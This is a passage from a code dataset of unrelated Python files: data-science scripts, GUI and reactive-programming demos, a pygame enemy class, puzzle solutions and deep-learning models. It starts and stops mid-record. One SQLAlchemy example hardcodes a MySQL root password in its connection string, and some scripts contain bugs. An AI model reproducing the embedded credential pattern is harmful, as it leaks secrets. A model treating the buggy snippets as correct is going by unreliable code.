pd.read_csv(MARKET_SIZE) \n market_size_df = process_market_size(market_size_df)\n models = ['webui', '7-days', 'monthly']\n result= []\n for root, dirs, files in os.walk(DATA_DIR):\n for file in files:\n f = file.split('_')\n if file.endswith(\".csv\") and 'summary_full' in file:\n filepath = os.path.join(root, file)\n df = pd.read_csv(filepath)\n df['index'] = df['Unnamed: 0']\n del df['Unnamed: 0']\n #df = df[df['index']=='%_apps_under_20%_error']\n df = df[df['index']=='mean']\n #df['Store'] = platform\n result.append(df)\n \n result = pd.concat(result)\n #result = result.groupby(['store_id', 'feed_id', 'category_id', 'range']).mul(axis='index').reset_index()\n result = result.merge(market_size_df, on=['store_id', 'category_id', 'feed_id'])\n result['rank_range_weight'] = result['range'].apply(lambda x: RANGE_WEIGHT_DICT[x])\n for model in models:\n result['weighted_inverse_average_error_%s'%model] = (1.0/result['rel_error_%s'%model]) * result['market_size'] * result['rank_range_weight'] \n result = result.drop_duplicates()\n result.to_csv('data/final_summary.csv', index=False)\n \n \nif __name__ == '__main__':\n main()\n\n","sub_path":"sbe_benchmark/sumarize.py","file_name":"sumarize.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"271959957","text":"import os\nimport re\nimport glob\nimport lxml.etree as ET\nfrom collections import namedtuple\n\n\ndef load_cinema_reviews(datasets_path, corpus_cine_folder):\n\n\t# Path de todas las reviews de cine en formato XML\n\treview_paths = glob.glob(\n\t os.path.join(datasets_path, corpus_cine_folder, '*.xml')\n\t)\n\n\treviews_dict = dict()\n\tsorted_review_paths = sorted(review_paths, key=lambda x: int(x.split(os.path.sep)[-1].split(\".\")[0]))\n\n\tfor idx, srp in enumerate(sorted_review_paths):\n\t parser = ET.XMLParser(encoding='ISO-8859-1', recover=True)\n\t root = ET.parse(srp, parser=parser).getroot()\n\t review = {\n\t 'author': root.get('author'),\n\t 'title': root.get('title'),\n 'sentiment': root.get('rank'),\n\t 'summary': root[0].text,\n\t 'review_text': root[1].text\n\t } \n\t reviews_dict.update({idx: review})\n\n\treturn reviews_dict\n\n\ndef get_lemmas_dict(data_path, lemmas_dict_file):\n lemmas_dict = {}\n with open(os.path.join(data_path, lemmas_dict_file), 'r', encoding='utf-8') as f:\n for line in f:\n (key, val) = line.split()\n lemmas_dict[str(val)] = key\n return lemmas_dict\n\n\ndef load_movie_titles(datasets_path, movie_titles_file):\n '''read a text file containing movie titles, stored as \"title (year)\" '''\n MT = namedtuple('Movie', 'title year')\n matcher = lambda l: re.match(r'(.*\\S)\\s+\\((\\d+)\\)', l)\n movie_tuple = lambda m: MT(m.group(1), int(m.group(2)))\n with open(os.path.join(datasets_path, movie_titles_file), 'r', encoding='utf-8') as f:\n titles = [movie_tuple(movie) \n for movie in map(matcher, f) if movie]\n return titles\n","sub_path":"NLP/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"589969135","text":"from plotting_utils import *\nfrom trajopt_testing import *\nfrom object_sampling import *\n\nenv = Environment() # create openrave environment \n# env.SetViewer('qtcoin') # attach viewer (optional) \n# env.GetPhysicsEngine().SetGravity([0,0,-10]) \n\nenv.Load('/home/viki/trajopt_utils/bookshelf_easier_pulledoutextra.zae')\n# env.Load('/home/viki/trajopt_utils/init_clutter.zae')\nrobot = env.GetRobot('pr2')\npreObjs = len(env.GetBodies())\nmanip = robot.GetManipulator(\"rightarm\")\nrobot.SetActiveDOFs(manip.GetArmIndices())\nTPlanner = or_trajopt.TrajoptPlanner()\nminLims = robot.GetActiveDOFLimits()[0]\nmaxLims = robot.GetActiveDOFLimits()[1]\nstartDOF = robot.GetActiveDOFValues()\nrobot.SetActiveDOFValues(startDOF)\n\nerrors = np.load('/home/viki/trajopt_utils/perturbedErrorBookshelf.txt.npy')\ntrajs = np.load('/home/viki/trajopt_utils/perturbedTrajBookshelf.txt.npy')\ninitializations = np.load('/home/viki/trajopt_utils/perturbedInitBookshelf.txt.npy')\nstarts, goals = getStartsAndGoals(trajs)\ngoals = [goals[0]]\n# goals = [np.array([-0.11860579, -0.27078926, -2.53044859, -0.43059192, 4.75675355,\n# -0.47717729, -2.1130558 ])]\n# startKeep = [np.array([-0.10694262, 0.54494402, -1.21343519, -0.53959419, 4.39120272,\n# -1.16924255, 0.52026279])]\n# startKeep = [np.array([ 0.24519869, 0.3484765 , -2.91996497, -0.29538065, 6.25284509, -0.90046152, -0.84571456])] # (successRatio[13])\nstartKeep = [np.array([-0.01366614, -0.09987283, -2.84752081, -0.40774119, 1.83361928, -1.40117315, -5.02086834])] # (successRatio[0])\nlimCoeff = 0.3\nallStarts = perturbDOFOne(env, startKeep, limCoeff)\nerrors, trajs, initializations = testPerturb(env, TPlanner, allStarts, goals)","sub_path":"quick_setup_perturb_orig.py","file_name":"quick_setup_perturb_orig.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"315738040","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 3 19:10:32 2018\n\n@author: royckchan\n\"\"\"\n\nannual_salary = float(input('Enter your starting annual salary: '))\nportion_saved = float(input('Enter the percent of your salary to save, as a decimal: '))\ntotal_cost = float(input('Enter the cost of your dream home: '))\nsemi_annual_raise = float(input('Enter the semi-­annual raise, as a decimal: '))\n\nportion_down_payment = 0.25\ncurrent_savings = 0\nr = 0.04\n\ndown_payment = total_cost * portion_down_payment\n\nnum_month = 0\n\nwhile current_savings < down_payment:\n current_savings += current_savings * r / 12 + annual_salary * portion_saved / 12\n num_month += 1\n if num_month % 6 == 0:\n annual_salary *= 1 + semi_annual_raise\nprint('Number of months:​', num_month)","sub_path":"Assignments/ps1/ps1b.py","file_name":"ps1b.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"104220072","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport sqlalchemy\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker,relationship\nfrom sqlalchemy import Column,Integer,String,DATE,ForeignKey\nfrom sqlalchemy import func\n\nengine = create_engine('mysql+pymysql://root:zhiaiziji@192.168.174.140/testdb',encoding='utf-8',echo=False)\n #连接方式 用户 密码 地址 数据库名 编码 输出过程\n\nBase = declarative_base() #生成一个orm基类\n\nclass Customer(Base):\n '''客户类'''\n __tablename__ = 'customer'\n id = Column(Integer, primary_key=True)\n name = Column(String(64))\n\n billing_address_id = Column(Integer, ForeignKey(\"address.id\"))#账单地址,关联地址表的ID\n shipping_address_id = Column(Integer, ForeignKey(\"address.id\"))#送货地址,关联地址表的ID\n\n billing_address = relationship(\"Address\",foreign_keys=[billing_address_id])\n shipping_address = relationship(\"Address\",foreign_keys=[shipping_address_id])\n\n def __repr__(self):\n return ''%(self.name,self.billing_address,self.shipping_address)\n\nclass Address(Base):\n __tablename__ = 'address'\n id = Column(Integer, primary_key=True)\n street = Column(String(64)) #街道\n city = Column(String(64)) #城市\n state = Column(String(64)) #州\n\n def __repr__(self):\n return ''%(self.id,self.street,self.city,self.state)\n\n#Base.metadata.create_all(engine) #创建表结构\n\nSession_class = sessionmaker(bind=engine) #创建与数据库的会话session class ,注意,这里返回给session的是个class,不是实例\nSession = Session_class() #生成session实例\n\n# addr1 = Address(street='buji',city='longgang',state='shenzhen')\n# addr2 = Address(street='huaqiang',city='futian',state='shenzhen')\n# addr3 = Address(street='dongpu',city='tianhe',state='guangzhou')\n#\n# #Session.add_all([addr1,addr2,addr3]) #插入所有数据\n#\n# c1 = Customer(name='Alex',billing_address_id=1,shipping_address_id=2)\n# c2 = Customer(name='Jack',billing_address_id=3,shipping_address_id=3)\n#\n# Session.add_all([c1,c2])\ndata = Session.query(Address).filter(Customer.billing_address_id).first()\nprint(data)\nSession.commit() #提交","sub_path":"Modular_five/mysql相关/sqlalchemy_多外键关联.py","file_name":"sqlalchemy_多外键关联.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"616712048","text":"#!/usr/bin/env python\n#coding:utf-8\n# version:python2.7.15\n# windows 10\n# reference: python gui cookbook\nimport Tkinter as tk\nimport ttk\nimport ScrolledText as scrolledtext\n\n# 创建主窗口\nwin = tk.Tk()\nwin.title(\"Python gui\")\n\n# 创建框架方便布局\nmonty = ttk.LabelFrame(win, text=\" monty python\")\nmonty.grid(column=0, row=0)\n\n# 按钮回调函数\ndef ClickMe():\n action.configure(text=\"Hello \" + name.get() + ' ' + numberChosen.get())\n\n# 创建按钮\naction = ttk.Button(monty, text=\"Click Me!\", command=ClickMe)\naction.grid(column=2, row=1, padx=8, pady=4)\n\n# 创建标签\nttk.Label(monty, text=\"Enter a name:\").grid(column=0, row=0, padx=8, pady=4)\nttk.Label(monty, text=\"Choose a number:\").grid(column=1, row=0, padx=8, pady=4)\n\n# 创建输入框\nname = tk.StringVar()\nnameEntered = ttk.Entry(monty, width=12, textvariable=name)\nnameEntered.focus() #place a cursor\nnameEntered.grid(column=0, row=1, padx=8, pady=4)\n\n# 创建下拉菜单\nnumber = tk.StringVar()\nnumberChosen = ttk.Combobox(monty, width=12, textvariable=number)\n# numberChosen = ttl.Combobox(monty, width=12, textvariable=number, state='readonly') # 禁止自己填写\nnumberChosen[\"values\"] = [1, 2, 4, 42, 100]\nnumberChosen.grid(column=1, row=1, padx=8, pady=4)\nnumberChosen.current(1) #选择默认value\n\ndef _spin():\n value = spin.get()\n scr.insert(tk.INSERT, value+'\\n')\n\n# 创建选值框\n# spin = tk.Spinbox(monty, from_=0, to=10, width=5, bd=8, command=_spin)\nspin = tk.Spinbox(monty, values=(1,2,4,8,16), width=5, bd=8, command=_spin)\nspin.grid(column=0, row=2)\n\n# 创建滚动文本框,定义长宽\nscrolW = 30\nscrolH = 3\n# wrap=tk.WORD防止单词在行末被分割,直接换到下一行\nscr = scrolledtext.ScrolledText(monty, width=scrolW, height=scrolH, wrap=tk.WORD)\n# 扩充所占单元格布局,合并3格\nscr.grid(column=0, columnspan=3, sticky=\"WE\")\n\nwin.mainloop()\n","sub_path":"Tkinter应用/chapter3/spinbox.py","file_name":"spinbox.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"96759133","text":"from rx import Observable\n\n# https://www.safaribooksonline.com/videos/reactive-python-for/9781491979006/9781491979006-video294990\n\nobs1 = Observable.from_([1, 2, 445, 46, 2, 23, 5])\nobs2 = Observable.from_([2, 3, 88, 14, 7, 1, 41])\n\nObservable.merge(obs1, obs2).subscribe(lambda x: print(x))\n\nobs1 = Observable.interval(1000).map(lambda i: \"Source 1: {0}\".format(i))\nobs2 = Observable.interval(500).map(lambda i: \"Source 2: {0}\".format(i))\nobs3 = Observable.interval(300).map(lambda i: \"Source 3: {0}\".format(i))\n\nObservable.merge(obs1, obs2, obs3) \\\n .subscribe(lambda x: print(x))\n\nObservable.from_([obs1, obs2, obs3]) \\\n .merge_all() \\\n .subscribe(lambda x: print(x))\n\nitems = ['\"12/123/345/123/3/6', \"8/3/1/6/9/05/\", \"4/3/6/8/9/4/3/67\"]\n\nObservable.from_(items) \\\n .map(lambda s: Observable.from_(s.split('/'))) \\\n .merge_all() \\\n .subscribe(lambda i: print(i))\n\nObservable.from_(items) \\\n .flat_map(lambda s: Observable.from_(s.split('/'))) \\\n .subscribe(lambda i: print(i))\n\nObservable.concat(obs1, obs2).subscribe(lambda x: print(x))\n\n\nletters = Observable.from_(['A', 'B', 'C', 'D', 'E', 'F'])\nnumbers = Observable.range(1,5)\n\nObservable.zip(letters, numbers, lambda l,n: \"{0}-({1})\".format(l,n))\\\n .subscribe(lambda x: print(x))\n\nletters.zip(numbers, lambda l,n: \"{0}-({1})\".format(l,n))\\\n .subscribe(lambda x: print(x))\n\n\nletters = Observable.from_(['Alpha', 'Betta', 'Gamma', 'Delta', 'Epsilon'])\nintervals = Observable.interval(1000)\n\nObservable.zip(letters, intervals, lambda l,i: l)\\\n .subscribe(lambda s: print(s), on_completed=lambda: print('Completed!'))\n\n\nlist_ = ['Alpha', 'Beta', 'Gamma', 'Delta', 'Epsilon']\n\n\nObservable.from_(list_)\\\n .group_by(lambda s: len(s))\\\n .flat_map(lambda grp: grp.to_list())\\\n .subscribe(lambda s: print(s))\n\nObservable.from_(list_)\\\n .group_by(lambda s: len(s))\\\n .flat_map(lambda grp: grp.count().map(lambda ct: (grp.key, ct)))\\\n .to_dict(lambda t: t[0], lambda t: t[1])\\\n .subscribe(lambda s: print(s))\n","sub_path":"observ/rx_combine.py","file_name":"rx_combine.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"305988537","text":"from __future__ import print_function\n\nimport torch\nfrom torch.autograd import Variable\nimport cv2\nimport time\nfrom imutils.video import FPS, WebcamVideoStream\nimport argparse\nimport sys\nimport os\nfrom os import path\nsys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\nfrom data import BaseTransform, VOC_CLASSES as labelmap\nfrom ssd import build_ssd\nfrom data import config as global_config\n\nCOLORS = [(255, 0, 0), (0, 255, 0), (0, 0, 255)]\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Single Shot MultiBox Detection')\n parser.add_argument('--weights', default='weights/ssd_300_VOC0712.pth',\n type=str, help='Trained state_dict file path')\n parser.add_argument('--cuda', default=False, type=bool,\n help='Use cuda in live demo')\n parser.add_argument('--img_dir', default=None,\n type=str, help='test image dir',required=True)\n parser.add_argument('--video_dir', default=None,\n type=str, help='test video dir')\n parser.add_argument('--wait_time', default=0,\n type=int, help='cv2 waitkey time')\n args = parser.parse_args()\n return args\n\ndef predict(frame,net, transform):\n height, width = frame.shape[:2]\n x = torch.from_numpy(transform(frame)[0]).permute(2, 0, 1)\n x = Variable(x.unsqueeze(0))\n y = net(x) # forward pass\n detections = y.data\n # scale each detection back up to the image\n scale = torch.Tensor([width, height, width, height])\n for i in range(detections.size(1)):\n j = 0\n while detections[0, i, j, 0] >= 0.6:\n pt = (detections[0, i, j, 1:] * scale).cpu().numpy()\n cv2.rectangle(frame,\n (int(pt[0]), int(pt[1])),\n (int(pt[2]), int(pt[3])),\n COLORS[i % 3], 2)\n cv2.putText(frame, labelmap[i - 1], (int(pt[0]), int(pt[1])),\n cv2.FONT_HERSHEY_SIMPLEX, 2, (255, 255, 255), 2, cv2.LINE_AA)\n j += 1\n return frame\n\ndef video_demo(video_list, net, transform, wait_time = 0):\n for filename in video_list:\n stream = cv2.VideoCapture(filename)\n if not stream.isOpened():\n print(\"Failed to open \", filename)\n continue\n while True:\n frame = stream.read()\n if frame is None:\n break\n key = cv2.waitKey(wait_time) & 0xFF\n frame = predict(frame, net, transform)\n # keybindings for display\n if key == ord('p'): # pause\n while True:\n key2 = cv2.waitKey(1) or 0xff\n cv2.imshow('frame', frame)\n if key2 == ord('p'): # resume\n break\n cv2.imshow('frame', frame)\n if key == 27: # exit\n return\n\ndef img_demo(img_list, net, transform, wait_time = 0):\n for filename in img_list:\n frame = cv2.imread(filename)\n if frame is None:\n continue\n key = cv2.waitKey(wait_time) & 0xFF\n frame = predict(frame, net, transform)\n # keybindings for display\n if key == ord('p'): # pause\n while True:\n key2 = cv2.waitKey(1) or 0xff\n cv2.imshow('frame', frame)\n if key2 == ord('p'): # resume\n break\n cv2.imshow('frame', frame)\n if key == 27: # exit\n break\n\n\nif __name__ == '__main__':\n\n args = parse_args()\n wait_time = args.wait_time\n net = build_ssd('test', 300, 21, batch_norm = global_config.BATCH_NORM) # initialize SSD\n net.load_state_dict(torch.load(args.weights))\n transform = BaseTransform(net.size, (104/256.0, 117/256.0, 123/256.0))\n net = net.eval()\n\n if args.img_dir is not None:\n img_list = []\n for dirpath, dirnames, filenames in os.walk(args.img_dir):\n for filename in filenames:\n if filename.endswith(('.jpg','.png','bmp')):\n img_list.append(os.path.join(dirpath,filename))\n img_demo(img_list, net, transform, wait_time)\n elif args.video_dir is not None:\n video_list = []\n for dirpath, dirnames, filenames in os.walk(args.img_dir):\n for filename in filenames:\n if filename.endswith(('.mkv','.mp4','3gp', '.mkv')):\n video_list.append(os.path.join(dirpath,filename))\n video_demo(video_list, net, transform, wait_time)\n\n\n\n\n","sub_path":"project/ssd.pytorch/demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":4543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"367758131","text":"import pygame\r\nimport Animation\r\nfrom Player import *\r\n\r\n\r\nclass Enemy(pygame.sprite.Sprite):\r\n def __init__(self, health, damage, numberOfLoot, typeOfReward, spawnPos_X, spawnPos_Y, spawn_animation, walkLoop_start, walkLoop_end):\r\n super().__init__()\r\n self.damage = damage\r\n self.health = health\r\n self.damage = 1\r\n self.spawning = True\r\n self.numberOfLoot = numberOfLoot\r\n self.typeOfReward = typeOfReward\r\n self.spawn_animation = spawn_animation\r\n self.idle_animation = None\r\n self.current_animation = spawn_animation\r\n self.image = self.current_animation.get_first_frame()\r\n self.rect = self.image.get_rect()\r\n self.rect.x = spawnPos_X\r\n self.rect.y = spawnPos_Y\r\n self.donePath = False\r\n self.walkLoop_start = walkLoop_start\r\n self.walkLoop_end = walkLoop_end\r\n\r\n def doDamage(self):\r\n player.TakeDamage(self.damage)\r\n return self.damage\r\n\r\n def TakeDamage(self, damage):\r\n self.health -= damage\r\n if self.health <= 0:\r\n self.health = 0\r\n self.alive = False\r\n def updateAnimation(self, time):\r\n if self.current_animation.type == \"spawning\":\r\n if self.current_animation.current_frame == self.current_animation.number_of_frames - 1:\r\n self.current_animation.update()\r\n self.current_animation = self.idle_animation\r\n self.spawning = False\r\n\r\n if self.current_animation.needsUpdate(time):\r\n self.image = self.current_animation.update()\r\n\r\n def chasePlayer(self, collisions, speed=1):\r\n if not self.spawning:\r\n move_x, move_y = 0, 0\r\n # Movement along x direction\r\n if self.rect.x > player.rect.x:\r\n move_x -= speed\r\n elif self.rect.x < player.rect.x:\r\n move_x += speed\r\n # Movement along y direction\r\n if self.rect.y < player.rect.y:\r\n move_y += speed\r\n elif self.rect.y > player.rect.y:\r\n move_y -= speed\r\n\r\n self.rect.x += move_x\r\n collision_list = pygame.sprite.spritecollide(self, collisions, False)\r\n for collision_object in collision_list:\r\n if move_x > 0:\r\n self.rect.right = collision_object.rect.left\r\n squid.doDamage()\r\n print(player.current_health)\r\n\r\n elif move_x < 0:\r\n self.rect.left = collision_object.rect.right\r\n\r\n self.rect.y += move_y\r\n collision_list = pygame.sprite.spritecollide(self, collisions, False)\r\n for collision_object in collision_list:\r\n if move_y > 0:\r\n self.rect.bottom = collision_object.rect.top\r\n elif move_y < 0:\r\n self.rect.top = collision_object.rect.bottom\r\n\r\n\r\n def walkPath(self, speed=1):\r\n if not self.spawning:\r\n move_x, move_y = 0, 0\r\n\r\n if not self.donePath:\r\n move_y -= speed\r\n if self.rect.y <= self.walkLoop_start:\r\n self.donePath = True\r\n elif self.donePath:\r\n move_y += speed\r\n if self.rect.y >= self.walkLoop_end:\r\n self.donePath = False\r\n print(move_y)\r\n self.rect.y += move_y\r\n \r\n\r\n#health, damage, numberOfLoot, typeOfReward, spawnPos_X, spawnPos_Y, spawn_animation, walkLoop_start, walkLoop_end\r\nsquid = Enemy(10, 5, 1, \"Sword\", 100, 650, Animation.squid_spawning, 0, 650)\r\ndragon_hatchling = Enemy(10, 1, 1, \"Gold\", 150, 650, Animation.dragon_spawning, 0, 650) \r\nsquid.idle_animation = Animation.squid_idle\r\ndragon_hatchling.idle_animation = Animation.dragon_idle\r\n","sub_path":"Enemy.py","file_name":"Enemy.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"470877827","text":"#You are given an integer, N. Your task is to print an alphabet rangoli of size N. (Rangoli is a form of Indian folk art based \n#on creation of patterns.)\n\n#Different sizes of alphabet rangoli are shown below:\n#size 3\n\n# ----c----\n# --c-b-c--\n# c-b-a-b-c\n# --c-b-c--\n# ----c----\n\n#size 5\n\n# --------e--------\n# ------e-d-e------\n# ----e-d-c-d-e----\n# --e-d-c-b-c-d-e--\n# e-d-c-b-a-b-c-d-e\n# --e-d-c-b-c-d-e--\n# ----e-d-c-d-e----\n# ------e-d-e------\n# --------e--------\n\n#Input Format\n#Only one line of input containing , the size of the rangoli.\n\n#Constraints\n#0 < N < 27\n\n#Output Format\n#Print the alphabet rangoli in the format explained above.\n\n\ndef print_rangoli(size):\n alphabet_list = list(\"abcdefghijklmnopqrstuvwxyz\")\n for i in range(size-1, 0, -1): \n row = ['-'] * (2 * size - 1) \n for j in range(size - i): \n row[size - 1 - j] = row[size - 1 + j] = alphabet_list[j + i]\n print ('-'.join(row))\n \n for i in range(0, size):\n row = ['-'] * (2 * size - 1)\n for j in range(size - i):\n row[size - 1 - j] = row[size - 1 + j] = alphabet_list[j + i]\n print ('-'.join(row))\n","sub_path":"Hackerrank/Python/alphabet_rangoli.py","file_name":"alphabet_rangoli.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"467744998","text":"#!/usr/bin/python3\n\ninp = open('../input/aoc-1.in', 'r').readlines()\ninp = [int(thing) for thing in inp]\n\nfor i in range(len(inp)):\n\tfor i2 in inp[i::]:\n\t\tfor i3 in inp[i::]:\n\t\t\tif inp[i] + i2 + i3 == 2020:\n\t\t\t\tprint(inp[i] * i2 * i3)\n\t\t\t\texit(0)\n","sub_path":"2020/Day1P2.py","file_name":"Day1P2.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"551115710","text":"directory = 'C:/users/hai/my projects/google code jam/2012/qualification/A/'\r\n\r\n\r\nt= '''ay\r\nbh\r\nce\r\nds\r\neo\r\nfc\r\ngv\r\nhx\r\nid\r\nju\r\nki\r\nlg\r\nml\r\nnb\r\nok\r\npr\r\nqz\r\nrt\r\nsn\r\ntw\r\nuj\r\nvp\r\nwf\r\nxm\r\nya\r\nzq'''\r\n\r\ntable = {}\r\nfor line in t.split():\r\n table[line[0]] = line[1]\r\n\r\ndef translate (line):\r\n l = list(line)\r\n for i in range(len(l)):\r\n if l[i] in table:\r\n l[i] = table[l[i]]\r\n return ''.join(l)\r\n\r\ndef solve (f_in, f_out):\r\n T = int(f_in.readline())\r\n for i in range(1,T+1):\r\n line = f_in.readline()\r\n out_line = translate(line)\r\n f_out.write('Case #' + str(i) + ': ' + out_line)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef main_run():\r\n import os\r\n filenames = [x for x in os.listdir (directory)]\r\n filenames = [x for x in filenames if x.endswith('.in')]\r\n l1 = [(os.stat(directory+x).st_ctime, x) for x in filenames]\r\n chosen_filename = sorted(l1)[-1][1][:-3]\r\n\r\n print ('Directory : ', directory)\r\n print ('Chosen Filename : ',chosen_filename)\r\n print()\r\n f_in = open(directory+chosen_filename+'.in')\r\n f_out = open(directory+chosen_filename+'.out', 'w')\r\n solve(f_in,f_out)\r\n f_in.close()\r\n f_out.close()\r\n\r\n\r\n\r\n\r\nmain_run()\r\n","sub_path":"solutions_1483485_0/Python/bigOnion/skeleton.py","file_name":"skeleton.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"389013679","text":"# Did you source set_environment_local.sh prior to running\n# this script? If not, it will fail.\nimport os\n\ndataset_directory = os.getenv('DATA_DIRECTORY')\ncode_directory = os.getenv('CODE_DIRECTORY')\ncache_directory = os.getenv('CACHE_DIRECTORY')\nartifacts_directory = os.getenv('ARTIFACTS_DIRECTORY')\nnussl_directory = os.getenv('NUSSL_DIRECTORY')\n\nvolumes = {\n nussl_directory: {\n 'bind': nussl_directory,\n 'mode': 'rw'\n },\n dataset_directory: {\n 'bind': dataset_directory,\n 'mode': 'rw'\n },\n code_directory: {\n 'bind': '/workspace',\n 'mode': 'rw'\n },\n cache_directory: {\n 'bind': cache_directory,\n 'mode': 'rw'\n },\n artifacts_directory: {\n 'bind': artifacts_directory,\n 'mode': 'rw'\n },\n}\n\ndefault_script_args = {\n 'run_in': 'host',\n 'num_gpus': 0,\n 'num_workers': 1,\n 'blocking': False\n}\n\nif __name__ == '__main__':\n print(volumes)\n","sub_path":"{{cookiecutter.repo_name}}/runners/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"591203877","text":"import os\nimport time\nimport warnings\nimport numpy as np\nimport keras\nfrom numpy import newaxis\nfrom keras.layers.core import Dense, Activation, Dropout\nfrom keras.layers.recurrent import LSTM\nfrom keras.models import Sequential\nfrom keras import optimizers,losses\nfrom keras import backend as K\nfrom keras.layers import Dense, Dropout, Activation, Flatten,Permute,Reshape\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import Input, Embedding\nfrom keras.models import Model\nfrom keras.layers.merge import concatenate\nimport tensorflow as tf\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' #Hide messy TensorFlow warnings\nwarnings.filterwarnings(\"ignore\") #Hide messy Numpy warnings\n\ndef share_model_linear(class_num = 101):\n###################################\n#lstm\n\tlayers = [5,100, #input(5,100)\n\t\t\t 100, #lstm1(100,50)\n\t\t\t 100, #lstm2(100,100)\n\t\t\t 150]\n\tlstm_input = Input(shape=(layers[1], layers[0]),name='lstm_input')#(100,5)\n\n\tlstm1 = LSTM(\n\t\t\t100,\n\t\t\treturn_sequences=True,\n\t\t\tactivation='elu',)(lstm_input) #(100,100)relu\n\tlstm2 = LSTM(\n\t\t\t100,\n\t\t\treturn_sequences=True,\n\t\t\tactivation='elu',)(lstm1) #(100,100)\n\tlstm_end = LSTM(\n\t\t\t150,\n\t\t\treturn_sequences=False,\n\t\t\tactivation='elu', )(lstm2) #(150,)relu\n\n####################################\n#cnn layer\n\tcnn_layers = [5,\n\t\t\t\t 10,\n\t\t\t\t 20,\n\t\t\t\t layers[4]]\n\tcnn_input = Input(shape=[1,layers[1], layers[0]],name='cnn_input')#(none,1,100,5)\n\tconv1 = Conv2D(cnn_layers[0], (4, 3),\n\t\t\t#padding='same',\n\t\t data_format='channels_first')(cnn_input)#(none,10,97,3)\n\tconv2 = Conv2D(cnn_layers[1], (2, 2),\n\t\t\t#padding='same',\n\t\t data_format='channels_first')(conv1) #(none,20,96,2)\n\tconv3 = Conv2D(cnn_layers[2], (2, 2),\n\t\t\t#padding='same',\n\t\t data_format='channels_first')(conv2) #(none,50,95,1)\n\t#pool = MaxPooling2D(pool_size=(3,1),data_format='channels_first')(conv1)\n\treshape = Reshape((cnn_layers[2],95))(conv3) #(none,50,95)\n\tpermt = Permute((2, 1))(reshape) #(none,95,50)\n\t# cnn_lstm1 = LSTM(\n\t# \t100,\n\t# \treturn_sequences=True,\n\t# \tactivation='relu', )(permt) # (95,100)\n\t# cnn_lstm2 = LSTM(\n\t# \t100,\n\t# \treturn_sequences=True,\n\t# \tactivation='relu', )(cnn_lstm1) # (95,100)\n\tcnn_lstm_out = LSTM(\n\t\t\tcnn_layers[-1],\n\t\t\treturn_sequences=False,\n\t\t\tactivation='elu',)(permt) #(150,)\n\n\n####################################\n#merge layer\n\n\tmerge = concatenate([lstm_end,cnn_lstm_out]) #150+150 = (300,)\n\n\t#4个Dense全连接层\n\thidden1 = Dense(200,activation='elu')(merge)#100 relu\n\tdp1 = Dropout(0.3)(hidden1)\n\thidden2 = Dense(100,activation='elu')(dp1) #50\n\tdp2 = Dropout(0.3)(hidden2)\n\thidden_end = Dense(100, activation='tanh')(dp1)#50 linear\n\tlinear_end = Dense(1,activation='tanh')(hidden_end)\n####################################\n\tlinear_model = Model(inputs=[lstm_input,cnn_input],outputs = linear_end)\n\tkeras.utils.plot_model(linear_model, to_file='model/modeltest4.png')\n\treturn linear_model\n\n\ndef pos_error(y_true,y_pred):\n\n bias = 0.1\n time = 100\n middle = [0.8,0.2]\n c = K.round(y_pred)\n sig_up_p = 1 / ( 1 + K.exp(-(y_pred - middle[0]) * 24)) + bias\n sig_down_p = 1 / ( 1 + K.exp(-(y_pred - middle[1]) * 24)) - 1 + bias\n pred_val = c * sig_up_p + (1 - c) * sig_down_p\n\n c_t = K.round(y_true)\n sig_up_t = 1 / (1 + K.exp(-(y_true - middle[0]) * 24)) + bias\n sig_down_t = 1 / (1 + K.exp(-(y_true - middle[1]) * 24)) - 1 + bias\n true_val = c_t * sig_up_t + (1 - c_t) * sig_down_t\n\n return K.abs(pred_val - true_val) * time\n\ndef twodays_distants(y_true,y_pred):\n try:\n n1 = 5\n n2 = 4\n c = 0.1\n col = K.int_shape(y_pred)\n if col[1] > 1:\n next_div = y_true[0:, 1] - y_pred[0:, 0]\n next_div = K.sqrt(K.square(next_div + c**2))#求预测值与下一真实值的直线距离, 参数c 控制横向距离。\n abs_div = K.abs(y_true - y_pred)#\n abs_div0 = abs_div[0:, 0]\n first_loss = K.pow((n1 * abs_div0 + next_div),n2)\n print('Two days losses')\n else:\n first_loss = K.mean(K.square(y_pred - y_true), axis=-1)\n print('One day losses')\n except:\n print('some 